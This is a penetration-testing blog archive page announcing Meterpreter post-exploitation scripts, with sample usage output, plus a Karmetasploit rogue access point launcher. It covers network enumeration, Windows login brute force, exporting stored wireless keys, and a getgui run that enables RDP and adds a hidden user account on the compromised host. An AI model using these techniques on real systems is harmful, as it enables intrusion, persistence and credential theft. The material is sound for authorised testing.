Top
Navigation

Entries in Metasploit (21)

Thursday
Jan082009

Meterpreter Post-Exploitation Scripts

DateThursday, January 8, 2009 at 8:45PM

Today the Metasploit post-exploitation script I wrote where approved and commited in to Metasploit 3 for enumeration and attack from the compromised machine using Windows native tools for both enumeration and attack. The scripts are:

  • Winenum - general windows enumeration script for gathering all kinds of information from windows host adapting the commands and informatio gathered to the version of windows where is ran at.
  • Netenum - network enumeration script for performing basic network enumeration of the target enviroment. It will perform ping sweeps, hostname bruteforce, reverse lokkups on ranges and general DNS record enumeration.
  • Winbf - it will perform loging brute force attacks against winown logins using dictionaries against a single login or a list of usernames. It will also enumerate the current windows account lockout and lenght policy so the user will be able to better tailor the attack.
  • Getgui - script for enabling RDP and for creating an account adding it to the appropiate groups to be able to get Remote Desktop on the target machine.
I hope they are as usefull as the original ones have been for me in client engagements where I was limited by the rules of engagement dictated by some of my clients. Glad to give back to such a good project.

AuthorCarlos Perez | Comment5 Comments | Print ArticlePrint Article
tagged , , ,
Saturday
Jan032009

Meterpreter Script for Basic Network Enumeration in Target's Netwrok

DateSaturday, January 3, 2009 at 12:20PM

Here is a script for basic network enumeration using windows natives tools in the target machine, the script is multi threaded for performance, it will perform the following:

* Ping Sweep
* DNS Reverse lookup on IP range
* Fordward Lookup bruteforce using a List of hostnames
* Get NS and MX records for a given domain.

you can download the script from http://www.darkoperator.com/netenum.tar.gz
Let me know if you like it and any recommendations are welcomed.

here is some sample output:

Code:
meterpreter > run netenum
Network Enumerator Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com
Usage:
OPTIONS:
   -d   Domain Name for DNS Fordward Lookup
   -fl        To Perform DNS Fordward Lookup on host list and domain
   -h        Help menu.
   -hl   File with Host List for DNS Fordward Lookup
   -ps        To Perform Ping Sweeo on IP Range
   -r   The target address range or CIDR identifier
   -rl        To Perform DNS Reverse Lookup on IP Range
   -st        To Perform DNS lookup of MX, NS and SOA records for a domain
meterpreter > run netenum -fl -hl /home/carlos/hostlist.txt -d google.com
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing DNS Fordward Lookup for hosts in /home/carlos/hostlist.txt for domain google.com
[*]     Name:cg-in-f100.google.com    209.85.171.100
[*]     Name:cg-in-f102.google.com    209.85.171.102
[*]     Name:googlemail.l.google.com    209.85.133.83,209.85.133.18,209.85.133.19
[*]     Name:cg-in-f101.google.com    209.85.171.101
meterpreter > run netenum -rl -r 209.85.171.100-209.85.171.110
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing DNS Reverse Lookup for IP range 209.85.171.100-209.85.171.110
[*]      209.85.171.100 is cg-in-f100.google.com
[*]      209.85.171.101 is cg-in-f101.google.com
[*]      209.85.171.102 is cg-in-f102.google.com
[*]      209.85.171.103 is cg-in-f103.google.com
[*]      209.85.171.104 is cg-in-f104.google.com
[*]      209.85.171.108 is cg-in-f108.google.com
meterpreter > run netenum -st -d google.com
[*] Getting MX and NS Records for Domain google.com
[*]     Non-authoritative answer:
[*]   
[*]     google.com    MX preference = 10, mail exchanger = smtp4.google.com
[*]     google.com    MX preference = 10, mail exchanger = smtp1.google.com
[*]     google.com    MX preference = 10, mail exchanger = smtp2.google.com
[*]     google.com    MX preference = 10, mail exchanger = smtp3.google.com
[*]   
[*]     google.com    nameserver = ns3.google.com
[*]     google.com    nameserver = ns4.google.com
[*]     google.com    nameserver = ns1.google.com
[*]     google.com    nameserver = ns2.google.com
[*]     smtp1.google.com    internet address = 209.85.237.25
[*]     smtp2.google.com    internet address = 64.233.165.25
[*]     smtp3.google.com    internet address = 64.233.183.25
[*]     smtp4.google.com    internet address = 72.14.221.25
[*]     ns1.google.com    internet address = 216.239.32.10
[*]     ns2.google.com    internet address = 216.239.34.10
[*]     ns3.google.com    internet address = 216.239.36.10
[*]     ns4.google.com    internet address = 216.239.38.10
meterpreter > run netenum -ps -r 209.85.171.100-209.85.171.110
[*] Network Enumerator Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Performing ping sweep for IP range 209.85.171.100-209.85.171.110
[*]     209.85.171.100 host found
[*]     209.85.171.101 host found
[*]     209.85.171.102 host found
[*]     209.85.171.103 host found
[*]     209.85.171.104 host found

AuthorCarlos Perez | CommentPost a Comment | Print ArticlePrint Article
tagged , , ,
Friday
Jan022009

Winenum Update

DateFriday, January 2, 2009 at 12:33AM

Josh Wright from Inguardians published a great paper called Vista Wireless Power Tools on the new features of Windows Vista wireless commands plus published several tools. I added the enumerations commands to Winenum plus it will now export the registry keys where the wireless configured networks of Windows XP and Windows Vista machines is stored, this files can be imported into the pentesters windows bos to gain access to the clients network or to get the wireless keys using other tools after importing.

AuthorCarlos Perez | Comment1 Comment | Print ArticlePrint Article
tagged , , , , ,
Friday
Jan022009

Meterpreter Script for RDP Configuration on Target

DateFriday, January 2, 2009 at 12:24AM

For those time when you just need GUI
I tested the script in Windows XP, Windows 2003, Windows Vista and Windows 2008 let me know if you like it.
http://www.darkoperator.com/getgui.tar.gz
Example:

meterpreter > run getgui -u SUPPORT_3028 -p P@ssword
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*]  RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]  Terminasl Services service is already set to auto
[*]  Opening port in local firewall if necessary
[*] Setting user account for logon
[*]  Adding User: SUPPORT_3028 with Password: P@ssword
[*]  Adding User: SUPPORT_3028 to local group Remote Desktop Users
[*] You can now login with the created user
meterpreter >

AuthorCarlos Perez | Comment2 Comments | Print ArticlePrint Article
tagged , , ,
Sunday
Dec282008

Updated Karmetasploit Attack Script

DateSunday, December 28, 2008 at 3:02PM

Here is the version of the script that will use the DigiNinja Karma patch for atheros, I find it a more flexible and reliable alternative to airbase-ng, but it will be limited to atheros cards for all other aircrack supported cards the modes that use airbase-ng can be used, plus fixed the path issue with Metasploit. Hope you guys like it. Here is the link to the script with the changes:
http://www.darkoperator.com/kmsapng.tar.gz
if you changed the kernel modules of your BT3 install you can get the patched modules of madwifi with digininja's karma patch and the patch from aircrack-ng here:
http://www.darkoperator.com/madwifi-r37 … g-patc.lzm
I do have to say that digininjas karma patch is a must for anyone using an atheros card and is doing wireless client side attacks.
Karmetasploit AP launcher by Carlos Perez for Backtrack3
Version 0.3
carlos_perez[at]darkoperator.com
usage: kmsap.sh 
Options:
-m         : Every mode is a different approach of the attack.
                       km     for regular karmetasploit attack using airbase-ng
                       kmf    for filtered attack where only targeted
                              clients can associate to the fake AP using the
                              filter file.
                       kma    for karmetasploit attack using DigiNinja patched
                              madwifi drivers.
                       kmaf   for karmetasploit attack using DigiNinja patched
                              madwifi drivers and mac address filtering.
-i    : Interface supported by aircrack-ng for injection
-f  : Text file with mac addresses of client computers
                 permited to connect to the fake AP used with kmf and
                       kmaf modes, on mac address per line.
-s         : SSID name used as the initial broadcast
-r  : Metasploit Resource Script (Optional)
-h               : This help message
Note: mode and interface are required for all types of attacks and -f for filtered attacks

AuthorCarlos Perez | CommentPost a Comment | Print ArticlePrint Article
tagged , , ,
Page 1 2 3 4 5 ... 5 Next 5 Entries »